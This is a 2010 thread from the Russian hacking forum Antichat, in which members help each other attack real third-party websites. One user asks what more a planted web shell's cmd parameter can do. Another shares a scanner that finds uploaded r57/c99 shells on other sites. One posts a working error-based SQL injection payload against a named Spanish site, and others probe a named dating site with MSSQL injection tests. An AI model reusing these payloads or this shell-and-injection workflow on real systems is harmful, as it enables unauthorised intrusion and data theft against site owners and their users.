ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.05.2010, 17:29
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Сообщение от Twoster
Потом http://site.com/files/shell.php?var=phpinfo();
Да phpinfo то выводит без проблем!!
П ричем var не работает, только cmd!
И что ещо можно сделать через команду cmd ??
Последний раз редактировалось GOGA075; 04.05.2010 в 20:03..
|
|
|
04.05.2010, 20:39
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
подскажите пхп - скрипт сканер сервера на наличие чужих шеллов и прочих опасных файлов
|
|
|
|
04.05.2010, 20:44
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от daniel_1024
подскажите пхп - скрипт сканер сервера на наличие чужих шеллов и прочих опасных файлов
ммм.. а как скрипт будет различать опасные файлы по твоему?
он же работает на стороне клиента..исходники ему не видны 
|
|
|
|
04.05.2010, 21:07
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от daniel_1024
подскажите пхп - скрипт сканер сервера на наличие чужих шеллов и прочих опасных файлов
http://slil.ru/29081007 вот, если я правильно понял. Ищит залитые шеллы на сторонних сайтах по их имени (r57.php,c99.php,c100.php и тд).
Если на своем сервере нужно найти модифицированные файлы или шеллы, то вот http://slil.ru/29081093
Последний раз редактировалось Redwood; 04.05.2010 в 21:18..
|
|
|
|
05.05.2010, 12:57
|
|
Познающий
Регистрация: 01.05.2010
Сообщений: 34
Провел на форуме:
118737
Репутация:
-5
|
|
Подскажите дальнейшие действия, есть доступ к phpinfo.php там естесвенно подробная инфа и пути к сайту что дальше делать? может ссылку на какую нибудь статью или еще что то... проверка всего сайта не sql , php иньекций и не Xss не вывело
Последний раз редактировалось oko; 05.05.2010 в 13:02..
|
|
|
|
05.05.2010, 13:08
|
|
Новичок
Регистрация: 21.12.2008
Сообщений: 24
Провел на форуме:
485675
Репутация:
10
|
|
Сообщение от oko
Подскажите дальнейшие действия, есть доступ к phpinfo.php там естесвенно подробная инфа и пути к сайту что дальше делать? может ссылку на какую нибудь статью или еще что то... проверка всего сайта не sql , php иньекций и не Xss не вывело
простое phpinfo тебе ничего особо полезного не даст.
|
|
|
|
05.05.2010, 16:00
|
|
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517
Репутация:
334
|
|
Не смог раскрутить. Кто что скажет?
Код:
chatmovil.terra.es/index.php?section=channel_list&viewing_category_type=1
|
|
|
|
05.05.2010, 16:03
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
http://chatmovil.terra.es/index.php?section=channel_list&viewing_category_type=1+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
|
|
|
|
05.05.2010, 18:41
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
что-то фантазии не хвататет:
http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+order+by+36
|
|
|
|
05.05.2010, 19:09
|
|
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
Провел на форуме:
619439
Репутация:
127
|
|
Сообщение от durito
что-то фантазии не хвататет:
http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+order+by+36
Это MSSQL, скорее всего фильтруется, потому что при 1 or 1=@@version-- просто становится недоступен сайт
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
